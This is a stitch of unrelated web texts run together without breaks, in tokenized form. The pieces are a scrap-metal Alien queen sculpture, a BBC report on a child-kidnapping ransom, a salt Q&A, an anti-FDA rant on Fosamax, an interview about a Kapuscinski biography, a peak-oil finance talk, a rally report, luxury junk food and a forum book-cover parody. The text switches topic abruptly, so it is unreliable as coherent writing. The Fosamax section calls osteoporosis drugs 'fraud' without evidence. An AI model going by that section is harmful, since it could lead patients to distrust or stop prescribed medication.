DOUBLE UPDATE : Roger Simon is also reporting that the the story in Ma'ariv is inaccurate .
But keep your eye on the general state of play between Israel and America on the subject of Israel 's nukes .
Hollywood is not always larger than life .
RoboSteel , an Ireland - based firm that creates sculptures from scrap metal , has created a real - world piece inspired by the the character of the queen from the cult Hollywood franchise Alien .
The piece , called " alien queen , " is 1,200 pounds of recycled steel and has more than 4,000 parts , polished and lacquered to create a replica that would make any tinsel - town art director proud .
A sci-fi horror film released in 1979 , Alien featured a band of aggressive extraterrestrials that killed humans on a spaceship .
In the sequel to the movie released in 1986 , the alien queen is a 15 feet tall , a terrifying monster whose power comes from being the only fertile member of the predatory species .
In RoboSteel 's real - world version , the queen is about half the size ( 2.5 meters , or 8 feet ) but still impressive in its details .
Nearly 90 percent of the parts for the sculpture came from Yamaha motorcycles collected from scrapyards , says RoboSteel .
All the parts were hand - welded .
The construction took about three months and three people worked full time to complete the project .
RoboSteel made an alien king and queen pair .
The king was sold last year and now lives in Trinidad .
If you want this sculpture next to the R2D2 in your living room , it will set you back by about $ 6,000 .
The sculpture will also be featured in Ripley 's Believe It or Not later this year .
More photos of the alien queen sculpture follow .
* Photos : RoboSteel *
[ via Walyou ]
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement A ransom of £ 110,000 was paid to gain the release of five - year - old Sahil Saeed , who was kidnapped in Pakistan , Spanish police have said .
A phone call made from Spain instructed the Oldham boy 's father to travel to Manchester and then Paris , where police saw him pay cash in a public street .
Earlier , Pakistan 's interior minister said some money had been paid within Pakistan in a bid to get Sahil freed .
Sahil was seized while visiting family on 3 March and freed 13 days later .
Spanish police said the initial phone call gave the family three days to pay the ransom .
Spanish authorities were alerted by Interpol after the call was traced to Spain .
They said police in Paris watched as people took the money handed over by Sahil 's father , Raja Saeed , and divided it into a bag and a trolley .
Sahil 's mother Akila Naqqash spoke to him by phone after he was freed French police followed them to the border with Spain .
Spanish police officers in Tarragona , Catalonia , arrested two Pakistani men and a Romanian woman in connection with the case after raiding a flat in Constanti , around 60 miles from Barcelona , on Tuesday .
Money totalling £ 110,000 , a computer and some mobile phones , which were used to contact Sahil 's father in Pakistan to demand the ransom , were found at the property .
Two of the group had driven to the French capital to collect the ransom payment and were arrested as they returned to Spain .
All three are due to appear in court in Spain on Thursday .
Two people have also been arrested in Paris .
The BBC's Madrid correspondent Sarah Rainsford said police reiterated that the investigation was still open .
Spain 's chief of police for violent crime , Serafin Castro , told reporters the arrests had been made as part of joint operation by French , Spanish and UK police .
He said the decision to make the arrests was taken after police were informed that Sahil had been freed , at about 0500 GMT .
" We arrested these three people and in the presence of a judicial secretary , we searched the flat . "
Interior Minister Rehman Malik said the money paid within Pakistan was " seed " money , which was paid to someone within a network with a promise of more money to provide information that would lead to the boy 's release .
He said the other option had been to attempt to capture the boy 's kidnappers but that could have risked " having the boy killed " .
Please turn on JavaScript .
Media requires JavaScript to play .
Sahil 's return is being organised by the British High Commission in Pakistan .
He was taken when robbers broke into his grandmother 's house while he and his father were on holiday visiting relatives in Jhelum , in the Punjab region .
Mr Saeed , 28 , returned to the UK last week against the wishes of Pakistan 's police .
Family members were said to have been beaten by the intruders during a six - hour ordeal , which ended with the robbers looting the house and fleeing with the boy .
On 16 March Sahil was left near a school about 20 km ( 12 miles ) from Jhelum before wandering into a field where he was found by locals .
His family said they were " ecstatic " at the news he had been freed and was unharmed .
His mother , Akila Naqqash , said she was " gobsmacked " at his calm reaction when they spoke on the phone .
The BBC's Aleem Maqbool in Islamabad says kidnapping is not rare in Pakistan , and even when ransoms are handed over , such cases do not always end happily .
After Sahil was released on Tuesday Assistant Chief Constable Dave Thompson , of Greater Manchester Police , said police did not expect to make imminent arrests in the UK but that there could be arrests in other parts of Europe .
BBC Pakistan correspondent Orla Guerin , in Jhelum , said that while there were still many unanswered questions , police kept repeating there was no evidence of involvement by anyone in Sahil 's family .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
What 's the difference between sea salt and table salt ?
Answer From Katherine Zeratsky , R.D. , L.D .
The main differences between sea salt and table salt are in their taste , texture and processing .
Sea salt is produced through evaporation of ocean water or water from saltwater lakes , usually with little processing .
Depending on the water source , this leaves behind certain trace minerals and elements .
The minerals add flavor and color to sea salt , which also comes in a variety of coarseness levels .
Table salt is typically mined from underground salt deposits .
Table salt is more heavily processed to eliminate minerals and usually contains an additive to prevent clumping .
Most table salt also has added iodine , an essential nutrient that helps maintain a healthy thyroid .
Sea salt and table salt have the same basic nutritional value , despite the fact that sea salt is often promoted as being healthier .
Sea salt and table salt contain comparable amounts of sodium by weight .
Whichever type of salt you enjoy , do so in moderation .
The Dietary Guidelines for Americans recommend limiting sodium to less than 2,300 milligrams a day .
Another drug debacle is blowing up in the corrupt face of the FDA .
I have reported for years that Fosamax and similar drugs are one of the greatest con jobs ever perpetrated on women ( statins and mental health drugs hold the top spots ) .
Now ABC
News is highlighting the fact that women who have faithfully taken their Fosamax , which is known to create highly disorganized and chaotic bone structure , are experiencing spontaneously breaking femur bones from doing virtually nothing .
In other words , one of the strongest bones in the body is disintegrating from the regular long - term use of Fosamax .
The use of bisphosphonate drugs to prevent osteoporosis is fraud .
At the center of the fraud is the FDA and their friends in Big Pharma .
Following the ABC exposé the FDA now says it will look into the matter further – is n’t it interesting what a little public exposure will do .
Regardless , the corrupt FDA looking into the problem is like having a fox checking on the status of a henhouse .
In addition to the FDA and Big Pharma , the medical profession itself is a major perpetrator of this fraud .
The information has been available for decades as to the extreme damage these drugs cause healthy bones .
There is no excuse for the ineptitude of the Western medical profession .
This is n’t a small joke .
These are major crimes against women that cause a serious deterioration of health .
Be clear about who is responsible : FDA management , Big Pharma , and prescribing physicians .
09/03/2010 Kapuscinki's poetic license Biographer Artur Domoslawski on why only a non-fictional Kapucinski is fascinating and educational
Daniel Passent : How did you come up with the title " Kapuscinski non-fiction ? "
Artur Domoslawksi : During his lifetime , Kapuscinski created two oeuvres .
One was his life 's work as reporter , which went on to become great literature about the mechanisms of power , revolutions and marginalised peoples .
The second was his story about himself , which he put together from facts and legends .
He understood that there is no such thing as a literary world without legends about its writers and so , like many before him , he helped create his own .
The life of a reporter , whose remit was revolution , war , and military coups in the Third World , provided brilliant material for this .
The book 's title signalises my decision to leave aside black - and - white portraiture because the world of non-fiction is never black - and - white .
It contains many truths , in this case many truths about my protagonist .
Secondly , it signalises my intention to separate fact and fiction .
Reporters around the world regarded Kapusckinski as a master , and yet they had their suspicions about the traces of - let 's call it – poetic licence , in his stories .
The participants of my workshops asked me to clarify this matter once and for all .
What sort of workshops are these ?
They are organised by Gabriel Garcia Marquez 's Colombian foundation , which works to raise journalistic standards in Latin America .
The workshop participants said of Kapuscinski that he was a secretive person , a puzzle ; we know his work but we know nothing about the man behind it .
Who is this person we so admire ?
I have tried to find out as much as possible about the things Kapuscinski liked to keep quiet .
I could n't stop thinking about the words of famous reporter Mark Danner , who said that he hoped my book would tell him about the experiences that provided Kapuscinski with such an excellent understanding of the mechanisms of power and revolution .
Where did you look for the answers ?
Mostly in Poland , in the Stalinist epoch of the past , October 1956 , in the stories about the corridors of power in the Central Committee .
In Polityka too .
I travelled much of the world : Mexico , Columbia , Bolivia , Angola , Ethiopia , Kenya , Tanzania , Uganda , the USA ...
I met the protagonists of his reportage and saw the places he lived and which he described .
How true were his descriptions ?
Kapuscinski wrote three kinds of books .
The early ones , which are mostly forgotten today , I would classify as journalism , " Gdyby cala Afryka ... " [ if all Africa " 1968 , not available in English ] in particular .
After that , Kapuscinski the reporter was born , and he gave himself over to literary reportage .
" Kirgiz schodzi z konia " [ the Kirghisz dismounts , 1968 , not available in English ] , " Chrystus z karabinem na ramieniu " [ Christ with a rifle on his shoulder 1975 , not available in English ] , " The Soccer Wars " [ " Wojna futbolowa " 1978 ] ...
And finally his greatest works , " The Emperor " [ " Cesarz " 1978 ] and " Shah of Shahs " [ " Szachinszach 1982 ] , in which he crosses the boundaries that divide literature and reportage .
It was thanks to these that his name went down in the history of both reportage and literature .
Both books received an enthusiastic international reception , although doubts were raised about factual accuracy .
People were asking whether they were reportage or literature .
And is that important ?
However we categorise these books , they will always be brilliant .
The difference between the two categories , however , is essential to the question of whether they should be used as examples – less so for novelists than for journalists , who have an obligation to factual truth .
Is a reporter allowed to correct reality , and if so , to what extent ?
If fiction uses reportage techniques , it does not have to pay a price .
If journalism crosses into the territory of fiction , it makes the reporter 's descriptions more attractive , often more profound , but the price is a high one , and that price is credibility .
A work like this risks being cast into doubt and this is exactly what happened .
Kapuscinski was a reporter with integrity and a writer with ingenious talent .
But let us imagine a journalist with less integrity and less talent , who feels free to cross the boundaries between reality and fiction .
What sort of writing does this produce ?
It is this fear that haunts me when I categorise some of his books as literature .
A colleague of mine at the Gazeta Wyborscza , Wojciech Jagielski , who published " Nocni wedrowcy " [ night wanderers 2009 , not available in English ] about child soldiers in Uganda , was acting honestly when he made it very clear that some of the book 's protagonists were fictional , even though they were modelled on real people .
He talked about the book as a story .
I agree with him that it is not good for journalistic credibility if a reporter allows himself too many freedoms .
In the age of the internet , when it is so easy to verify things instantaneously , Kapuscinki 's type of writing is no longer sustainable .
How would you describe his " creative relationship with the facts " ?
He once showed a report he had written for an agency to some of his friends who were with him in Africa .
They protested : Rysiek , that was not there , it was there , and the sequence of events was different .
You do n't understand a thing , he replied irritatedly , it 's not about the details , it 's about the heart of the matter .
When Wojciech Gielzynski asked him whether he would allow minor tweaking to the sequence of events , in the chronology for example , for the sake of impact , he replied yes , one could " embellish reality " as long as one used authentic elements .
The people you talked to in Addis Abeba , who knew Kapuscinksi , did not only question individual details , they also cast doubts on the judgement passed on Haile Selassi in " The Emperor " .
In " The Emperor " Kapuscinski is clearly operating in literary territory .
The book 's fawning courtiers talk a Baroque language with a deliberately literary turn of phrase .
To write this history - and in this form - he read up on Baroque literature .
One of his literary friends said that " The Emperor " is the most important Polish novel of the 20th century !
There is some truth to this .
Which is why I am so sceptical about the criticism by narrow - minded specialists .
To read " The Emperor " or " Shah of Shahs " as schoolbooks on the history of Ethiopia or Iran is a mistake .
Kapuscinski presented specific intellectual constructions , he universalised human behaviour and the mechanisms of societal trauma .
I prefer to read this book as a treatise on power and not as a history of the feudal lords of Ethiopia .
Did he lack information ?
Was he perhaps bending the truth in the interests of ideology ?
If you read the reports he wrote for the PAP news agency , it 's immediately obvious how well - versed and competent he was with his material .
If his writing contained ideology , it came from his convictions : he was a committed communist for many years .
He was neither a cynic , nor a Wallenrod who wrote one thing and believed another .
Until the late seventies he believed in the system of People 's Poland .
Even in the Solidarnosc years of 1980 - 1981 he was still interested , although the new movement fascinated him , in reforming the party , in particular the United Polish Worker 's Party .
He sympathised with so - called horizontal structures .
He handed in his membership card under martial law .
You also write that even as a loyal party member he maintained an independent vision .
More than once .
When he was a PAP correspondent in Latin America , Moscow and Havanna were arguing over revolutionary strategy in the region .
At that time Moscow was opposed to Che Guevara - style guerrilla warfare .
Che was not kosher in Moscow 's eyes because he started revolutions where and when he saw fit , without asking the Soviets , and thus damaged their relations with Washington during the period of so - called peaceful coexistence .
Kapuscinski sympathised with these " Christs with guns over their shoulders " who – against Kremlin orders – went off to battle with weapons in their hands .
He translated Guevara 's Bolivian diary which was published thanks to his connections with the Central Committee , but it was never re-issued in People 's Poland .
He sympathised with the guerillos , and yet his books got shining reviews in the USA .
It was not without incident .
The American publisher , who was sensitive about potential legal repercussions , demanded he sign a declaration that the people and statements in " The Emperor " were true .
Kapuscinski signed - confident that nothing would happen .
Because the people were not authentic ?
Even if they were , he never actually named names , only initials .
When " The Emperor " was published in New York in 1983 , it was to great critical acclaim , and " Shah of Shahs " was equally successful two years later .
It was the futurist Alvin Toffler who made sure that " The Emperor " was well received , by giving the manuscript to Wiktor Osiatynski .
John Updike 's review in The New Yorker also played an important role .
Salman Rushdie , too , did some selfless promotion for Kapuscinski when , in a questionnaire , he listed " The Emperor " as his book of the year .
The snowball of fame was rolling .
Kapuscinki's books have been translated into more than 20 languages .
It was in Spain , where interest in the Third World was high , that his career really took off , and in Italy .
His " Imperium " , which was translated in the nineties , satisfied a need to tell the story of the collapse of the system in our part of Europe .
Both countries had a flourishing left - wing culture which Kapuscinski was close to .
But he also had his critics internationally , who accused him of making mistakes , such as crossing borders which should not be crossed in journalism .
Why did he have no critics in Poland ?
He wanted to be loved , he worked at it and was loved .
What he wrote was outstanding but the critics had seen plenty of outstanding writing .
Kapuscinski disarmed them with charisma .
He knew the influential reviewers and bowled them over with his charm .
He knew that he was thin - skinned and ill - equipped to endure derogatory opinions .
He also knew that he did his writing under stressful conditions and that it was no mean feat to get to dangerous regions in Africa where he risked his health and even his life .
Was he doing all this only to be ridiculed by some half - educated critic .
...
He was protecting his work .
The writer Malgorzata Szejnert says that no energy is lost in nature , and that a lack of criticism will be followed by a backlash of harsh , unfair criticism .
I share this fear .
A lack of criticism is always pleasant for a writer , but it always has a nasty flip side which is that the work is not subjected to proper analysis .
Kapuscinski is celebrated in Poland as " our great countryman " , as the journalist of the century , but what he said about the world does not really fit with mainstream thought in Poland , and has never triggered any substantial interest .
And this is a great shame .
In the past , he sympathised with armed rebellion in the Third World and , more recently , with the new left - wing opposition to Neoliberalism .
He was critical of the hawks in America , the imperialist U.S. answer to the terrorist threat and the invasion of Iraq .
He talked about it in interviews , wrote short reflections but no one got angry about it or took him to task ( I know of only one exception : Ernest Skalski's polemic in the Gazeta Wyborsza ) .
If all this had been written by someone else , they would have been beaten up by right - wing and liberal journalists alike , and he would have been thrown into a padded cell as a left - wing radical .
But because it was Kapuscinski , it would have been a faux pas to criticise him , to pick apart what he said , and so it was greeted with a polite silence .
It 's a pity – because it could have provoked a serious discussion .
If that had happened , my heart and pen would have sided with Rysiek .
But the fact is that he was no friend of confrontation and polemics .
He like to be heard , but heated discussions were not his thing .
As time went by , Kapuscinski changed the role he played – from that of reporter who discovered the world , he tried to become the wise old man who understood and explained it .
I preferred him in the earlier role .
This evolution had two reasons .
The first was a question of age .
He was no longer determined to set off on long , exhausting journeys , mainly due to problems with his health .
He continued to travel right up to the end , but mostly for short periods only .
The second reason was his aspirations .
When he was a reporter he wanted to be a writer .
He said to one of his friends :
You are a writer and I 'm just a journalist .
Once he was regarded as a writer , his next wish was to be a thinker .
Some critics said that he was only innovative when he had physical contact with reality , when he was tired and dirty ; the library Kapuscinski – they say , was unbalanced .
In my opinion the library Kapuscinski was also original .
He questioned the view that during the Cold War years there was a fight taking place in the Third World between the good West and evil Communism .
He showed that the West was an oppressive power in the Southern hemisphere .
He then transferred these thoughts to the time after the Cold War .
He had original ideas about the roots of totalitarianism .
In " The Shadow of the Sun " [ " Heban " , 1998 ] he wrote that the contempt for others , the treatment of others as non-humans was written into the logbooks of the slave - hunters .
The Europeans , whose contempt for human life peaked during the Holocaust and the Gulag , had already treated the Africans in the same way .
He also observed that in the age of globalisation vast swaths of the world were being de-globalised .
He talked about them as the new white areas on the map .
He made small , ingenious discoveries , for example , that life in Africa was revolutionised by the invention of the plastic cannister which could be used for carrying water .
He did not develop grand theories , but in small observations he was often more original than many a wise man .
You point out that Kapuscinski created his own legend .
But why would a brilliant , internationally successful writer want to rely on legend ?
He came from a small country , whose language no - one understood on the other side of the Iron Curtain .
He thought he needed legend , to get himself noticed .
He deservedly enjoyed the reputation of being a witness to the revolution , to the fall of colonialism , the birth of the Third World .
To this image he added or allowed people to believe , that he had known a string of legendary personalities , yes , that he had even been friends with them , with Lumumba , Che Guevara ...
Whereas by the time he got to Africa , Lumumba was no longer alive .
On the back cover of the English edition of " The Soccer War " it said that he had known both these men , but when the Che biographer Jon Lee Anderson asked him about it , Kapuscinski said that the publisher had made a mistake .
But he never corrected the mistake , and the information about his friendship with Che continued to appear on book covers and articles about him ...
The legend took on a life of its own .
Was this also true of the tales of his dangerous adventures ?
I know that when he told friends about them he had a twinkle in his eye .
As the years went by , he began to take the legends seriously and not to correct them when , for example , people wrote about shootings that never happened .
But he did genuinely end up in a number of truly dangerous situations , during the war in Angola , for example .
But he never faced a firing squad ?
That 's is a very nuanced issue .
I would ask you to be patient and wait for the book .
You and Kapuscinski were friends .
Did you not find it difficult to show a Rysiek who was not a monument ?
A little at first .
But people do n't live on monuments , they live on the ground .
There have been enough monuments and hagiographies to Kapuscinski and yet we still knew very little about him .
In Poland , nobody had really given a thought to what had been written and said about him .
Like every writer , I have the naïve belief that my book will change that – without this belief there is no point to all those hours in front of the computer .
I also believe that a Kapuscinski who comes wrapped in compliments , laurels and uncritical enthusiasm is not particularly interesting , it teaches us and challenges nothing .
Only a non-fictional Kapuscinski is fascinating and educational .
While I was working on the book , I would often think about a conversation I 'd had with my professor Claybourne Carson at Stanford , a historian who published the writings of Martin Luther King .
Carson gained the confidence of King 's widow and she gave him all her husband 's papers and access to the archive , and it was there that he discovered that King 's doctoral thesis was plagiarised .
And he published this in the press .
The widow was incensed , but eventually she understood that any self - respecting scholar would have done the same .
She had class .
I asked Carson whether he was devastated by the discovery .
He answered that he had never regarded King as a god , but as a human being .
He found it fascinating that normal people were able to do unusual things .
It is not good , he said , to admire people for being perfect , because when it emerges that they have their faults – and they always do ( King , for example , had a weakness for the ladies ) – our belief inevitably collapses .
It is better to admire idols for the amazing things they achieve despite their being ordinary people .
With these words of my professor in the back of my mind , I still admire Rysiek , despite the various discoveries I have made – as a friend and master .
In one chapter you describe Kapuscinski's relationship with the upper echelons of the Polish United Workers ' Party .
We read and love Kapuscinski , because he was a great reporter and writer .
And he was not great because he knew [ the Central Committee secretary Ryszard ] Frelek or [ Zenon ] Kliszko .
Indeed he maintained contacts , and friendly ones , to people in high places , who helped him with his career .
In People 's Poland you needed people who regarded all this foreign travel as valuable , who supported him , who would sign the application forms etc.
Kapuscinski was good at handling these affairs .
He did not take up with people in power out of cynicism .
For many years he was a committed communist , and he was a party member for almost three decades .
He experienced disappointments , but continued to believe in socialism for a long time , especially because he knew capitalism and the West in its colonial and postcolonial versions , from the perspective of the devastations and the crimes , which the free world carried out on the southern hemisphere .
He regarded People 's Poland as his state and he did not see that having contact with the people in power was anything to be ashamed of , unlike what you read today from the opponents of communism .
In his last years , he was less able to derive pleasure from his success and started to worry that the lustrators could harm him .
He was also worried that the legend would start to crumble .
Since the mid-nineties , he felt – intellectually and spiritually – more at home abroad than in Poland .
After the early years , when people in the west were getting drunk on the end of history , there was a renewed interest in the political left .
and Kapuscinki's heart beat on the left to the very end , and like the Third World – it was sensitive towards injustice and inequality .
In Poland , where free - market and neoliberal thinking dominated , he felt as if he was from another planet .
In his " Lapidaria " there are passages that even radical critics of neoliberalism and the new forms of imperialism would not be ashamed of .
He felt fantastic when he was giving seminars in Latin America or readings in Spain and Italy .
There was a chemistry that existed there between himself and his audience which he never felt in Poland .
*
This interview originally appeared in Polish in Polityka on 20.01.2010 .
" Kapuscinski non-fiction " by Artur Domoslawski was published on March first by Swiat Ksiazki publishers .
The book was originally commissioned by Znak publishers who decided against publication .
Translation from the German : lp
Get the signandsight newsletter for regular updates on feature articles .
signandsight.com - let 's talk european .
My financial forecast really has implications for beyond 2008 , so I added some more forecasting thoughts as well .
In this post , I would like to share this presentation with you .
A download of the presentation , plus an audio recording , are available at the Biophysical Economics Conference Proceedings website under Gail Tverberg .
Back in October , I participated in the 2 nd International Biophysical Economics Conference at SUNY - ESF in Syracuse , New York .
Charlie
Hall had written to me , inviting me to come and give a talk .
Specifically , he wanted me to go back to my post from January 2008 called Peak Oil and the Financial Markets : A Forecast for 2008 and explain why my forecasts had turned out pretty close to correct , while many others widely missed the mark .
The title he suggested for the talk was Delusions of Finance .
I am a casualty actuary by training and spent many years doing forecasting and modeling as an insurance company employee and later as a consultant to insurance companies .
Many of these companies were small medical malpractice insurance companies that provided insurance for a group of hospitals or physicians .
Medical malpractice claims are notoriously slow to be reported and to be paid , so we had to forecast many years of reporting and payments , ( and corresponding investment income ) .
These models were used both for determining appropriate insurance rates and for determining balance sheet reserves for these companies .
Quite often I was involved in putting together models for proposed new companies in order to estimate likely capital requirements .
I was also prepared a lot of estimates of the likely impacts of medical malpractice reforms .
All of this did n't really give me any special training for making financial forecasts relating to peak oil , but it did give me a lot of practice with making forecasts and trying to think outside the box .
I needed to figure out what was unique to each situation , and figure out a way to model it .
I had n't gone through the standard MBA training , but I had bumped up against a fair amount of it along the way .
My background goes back far enough that I had a chance to see how badly insurance companies fared back in the 1974 period , when oil shocks affected insurance companies .
One of my former employers went bankrupt , and another one nearly did .
I could see that if a similar situation happened now , other financial companies would likely be affected as well .
Quite a bit of the rest of this presentation is fairly self - explanatory , especially if you have seen some of my other presentations , so I wo n't provide too much in the way of comments .
Slide 3
This is a link to the full post .
You may want to read it , if you have n't previously .
Slide 4
My later slides explain these points more fully .
Slide 5
Slide 6
Slide 7
If you stop to think about it , there a quite a few differences in the way the economy functions in a period of economic growth and in a period of economic decline .
The assumption of continued economic growth by traditional economists ( who do n't consider resources and their limits ) has been so strong that most have not even considered what the economy would look like in a period of long - term decline .
Slide 8
Many have observed that there would have been defaults , even without peak oil , because of the reckless lending that had been done .
I would contend that at least part of the reason the lending had been done was to give the illusion of growth , when there really was n't much apart from that generated from very loose lending standards .
Furthermore , even if loose lending standards were part of the problem , the problems related to peak oil made it worse ( and can be expected to cause more problems in the future ) .
Slide 9
When there is n't a problem like peak oil ( or limits to growth in general ) , debt defaults are in fact pretty much independent .
That is why the system for determining insurance charges to be included in the interest rates charged for loans worked pretty well until peak oil came along .
In the absence of peak oil , a homeowner or businessman defaults because of some particular problems he or she has .
Past history is likely to be predictive of the future , because while there are different individuals defaulting , the average number of defaults will tend to be pretty stable from year to year .
Slide 10
It is possible that there will be some loans in a declining economy , but their use will be much less widespread than we see today .
Their cost will also tend to be higher .
Slide 11
When lending is increasing , businesses have more money to invest in new plants and equipment and homeowners find it easy to get loans of new homes or for home improvements .
Slide 12
As countries cut back their stimulus funds , the decline in credit available may be especially severe .
I noticed this article this morning :
Lenders warn of mortgage shortages
Britain ’s banks and building societies have warned that they will have to slash mortgage lending and raise rates on home loans if the government insists on prompt and full repayment of the £ 300 bn they have received in state support since 2008 .
Slide 13
Slide 14
In the US , homeowners used their homes as a piggy - banks when home values were rising .
They could refinance their homes , remove the built - up equity , and buy new cars , furniture , and other things .
When there are fewer home buyers ( because of less loan availability ) , and continually declining values , the effect is reversed .
Slide 15
Credit problems are really what are likely to spread the lack of oil to a much broader reduction in fuel use , essentially through growing recession .
This recession may affect OECD to a greater extent than non-OECD , but there are such great links between the two that I expect eventually all will be affected .
This reduction in fuel use is likely to be described in the press as " reduced demand " -- which it is , but because of recession induced by credit contraction ( ultimately going back to lack of growth in oil supply ) .
Slide 16
Slide 17
Slide 18
I am sure that some trade will continue , even if countries have financial problems .
But it seems to me that a very large amount of trade is needed to keep up our system at the current level .
High tech equipment would seem to be hardest to create with local materials alone .
We can make simple things , like wheelbarrows and shovels with recycled steel , but it is not clear that precision parts for things like computers and other high tech equipment can be made without exactly the right imports from around the world , and factories set up with the right controls .
Slide 19
These changes could start very soon .
It is hard to know precisely how things will play out .
On April 25 , over 1000 New York - area Jewish extremists gathered in midtown Manhattan to rally against the Barack Obama administration ’s call for a freeze on construction in occupied East Jerusalem and to demand unlimited rights to colonize the West Bank .
With Obama and top
White House officials engaged in a charm offensive to repair their relationship with mainstream American Jewish organizations , speakers at the rally lashed out at the Jewish groups and Democratic politicians , warning that cozying up to Obama would endanger Israel and imperil their cherished settlement enterprise .
Charles Schumer and another major New York - area Jewish Democrat , Rep. Anthony Weiner , have scrambled to appease the extreme pro-settler elements railing against Obama .
On the radio show of Nachum Segal , a right - wing Orthodox Jew popular among the demonstrators , Schumer called Obama ’s demands to stop the construction of settlements in East Jerusalem " counter - productive " and boasted about warning White House aides that he would " publicly blast " them if the President did not relent .
But Schumer ’s pandering appeared to be futile .
At the rally , demonstrators waved placards reading , " Where ’s Schumer ? " and complained to me that the senator ’s criticism of Obama was too little , too late .
Meanwhile , according to the New York Jewish Week , Weiner had begged organizers for a chance to speak at the rally but was rebuffed out of fear that he might put " some sort of Democratic ‘ spin ’ on the president ’s policies . "
Beth Galinsky , a rally organizer , claimed Weiner was waiting in a nearby car during the rally , hoping that his desperate pleas would provide him an opportunity to address the crowd .
While the Democratic congressman was shut out , the Republican Jewish Coalition was afforded a prominent role at the demonstration beside far - right groups like the Zionist Organization of America , Z Street , Americans for a Safe Israel , Christians United for Israel , and Manhigut Yehudit , an anti-democratic group that calls for theocratic rule over Israel .
Supporters of Manhigut leader and Likud politician Moshe Feiglin distributed fliers promoting Feiglin ’s upcoming campaign for prime minister of Israel .
An open advocate of ethnic cleansing who has proposed depriving the Palestinians of drinking water , Feiglin recently called Vice President Biden " a diseased leper . "
While the pro-settler elements rallied in Manhattan , their counterparts from the radical Kahanist movement in the Hebron - based settlement of Tel Rumeida rampaged through Palestinian neighborhood in East Jerusalem , inciting violent confrontations while announcing their intention to rid the area of its historical Arab presence .
Dov Hikind , a Democratic New York Assemblymember who represents Orthodox Jewish areas in Brooklyn , is a longtime supporter of Baruch Marzel , the settler leader who orchestrated the provocations in East Jerusalem .
" These are people who love us and help us , they are real lovers of Israel , " Marzel once said of Hikind and his allies .
Hikind ’s role as a keynote speaker at the New York rally was one of many hints that the events in Manhattan and Jerusalem were closely coordinated .
The Manhattan rally took on a distinctively Tea Party - flavor .
Besides issuing maximalist calls for the expulsion of the Palestinians , demonstrators assailed Obama as a secret Muslim with no legitimate right to serve as President of the United States .
When I was identified by a particularly ornery rally participant as " the self - hating asshole Max Blumenthal , " I decided it was time to make my exit .
However , as I walked down 44th Street towards the subway , an elderly man grabbed me and attempted to snatch my camera ( I had seen the gun-toting Marzel use similar tactics on anti-settlement activists documenting his exploits in the West Bank ) .
" You ’re not a Jew !
Give me the film ! " the man exclaimed .
A mob of demonstrators suddenly formed and began advancing towards me .
Luckily , two NYPD officers were nearby .
They pried the man off me and gave me enough time to escape .
I paced for two blocks until I reached Grand Central Station then disappeared into the crowd .
This report was originally posted at Alternet .
The most expensive junk food With the finest ingredients and astronomical prices , these ordinarily ' cheap ' eats are anything but .
3 of 5 Golden Opulence sundae $ 1,000
First dates looking to impress or sweet - sixteens in search of something special strike gold , quite literally , at Serendipity 3 , the legendary New York City eatery where celebs are often spotted .
The restaurant 's golden opulence sundae is covered in 23 - carat edible gold leaf and is also rich in flavor thanks to Tahitian vanilla ice cream infused with Madagascar vanilla beans and chunks of rare Chuao chocolate from Venezuela .
In lieu of Hershey 's syrup and a maraschino cherry , this sundae is drizzled with one of the world 's most expensive chocolates , from Amedei Porcelana , and then adorned with candied fruits , gold covered almonds , chocolate truffles and marzipan cherries .
The dish also features a dollop of sweet Grande Passion caviar served with a mother of pearl spoon and a gilded sugar flower .
The whole shebang looks as good as it tastes , served in a Baccarat crystal goblet ( yours to keep ) with an 18 - carat gold spoon ( not included ) .
www.serendipity3.com
First dates looking to impress or sweet - sixteens in search of something special strike gold , quite literally , at Serendipity 3 , the legendary New York City eatery where celebs are often spotted .
The restaurant 's golden opulence sundae is covered in 23 - carat edible gold leaf and is also rich in flavor thanks to Tahitian vanilla ice cream infused with Madagascar vanilla beans and chunks of rare Chuao chocolate from Venezuela .
In lieu of Hershey 's syrup and a maraschino cherry , this sundae is drizzled with one of the world 's most expensive chocolates , from Amedei Porcelana , and then adorned with candied fruits , gold covered almonds , chocolate truffles and marzipan cherries .
The dish also features a dollop of sweet Grande Passion caviar served with a mother of pearl spoon and a gilded sugar flower .
The whole shebang looks as good as it tastes , served in a Baccarat crystal goblet ( yours to keep ) with an 18 - carat gold spoon ( not included ) .
Double truffle burger
Macaroni and cheese
Ice cream sundae
Philly cheesesteak
Pizza with caviar
There 's a lot of debate about science - fiction and fantasy novels in Something Awful 's Book Barn forum , whether it 's fans discussing plot points and themes or detractors asserting that people 's reading time would be better spent with higher - brow literature .
Such objections aside , even the most dubious - looking genre fare attracts followings rabid enough to sustain lengthy series , so MikeTheGreat figured he'd throw his pseudonym " S.G. Melvar " into the fray .
Other SA Forum Goons then contributed their own covers and book - jacket summaries , and while all these creations are intentionally bad , it 's easy to imagine any of them attracting real , pathetic supporters .
MikeTheGreat
Plight of the Doom Planet is a four - part series in the greater Omicron Sunrider saga .
On a forgotten planet in the far reaches of a lost galaxy 's outer territories , the last surviving city of Tong 'th is in peril .
After the revolution to overthrow the malevolent plutocratic kings , a schism rips through the city , rending its citizens and their allegiances asunder .
But with the appearance of a mysterious prophet from the forbidden wastelands , the last bastion of humanity on this desolate world is forced to unite against the impending arrival of an even greater menace .
The sons of the once - mighty kings have been at war for years with the radical freedom fighters , led by the charismatic mercenary captain Omicron Sunrider .
But Andaa , a forgotten descendant of the old Draethian dynasty , knows that even more sinister forces are afoot beneath the great city 's depths .
The words of the Chaosmancer are cryptic and arcane , but this Moonchild may hold the key to unlocking Tong 'th 's ancient secrets and saving its people from oblivion .
Turmoil has erupted in the city of Tong 'th , and an ancient beast has awoken .
The Wizardarium Maelfactorate has for centuries served the ruling kings as civil servants and bureaucrats .
They have waited for centuries to strike , and with Tong 'th at its most vulnerable , Grand Wizard Ryacal has seized power .
Together , Omicron Sunrider , Andaa , and the great Chaosmancer Serrus must march on the Ravensblood Tower and recapture the city from the wicked tyrants .
In the thrilling conclusion to Plight of the Doom Planet , the great city of Tong 'th is in its most desperate hour .
Survivors of the Wizardarium raid have fled underground , and chaos reigns supreme .
The threat has passed , but where will Sunrider 's forces go next ?
With the Doom Planet saved , Omicron Sunrider 's mercenaries are known throughout the system .
In S. G. Melvar 's new spin - off series , Dreams of the Wish Tree , beloved space paparazzi / romantic maven Brooks Lightstrider leads a band of adventurers to the Valley of the Cyclopsal Bi-Pedes , in search of the fabled relic , Omega 's Tear .
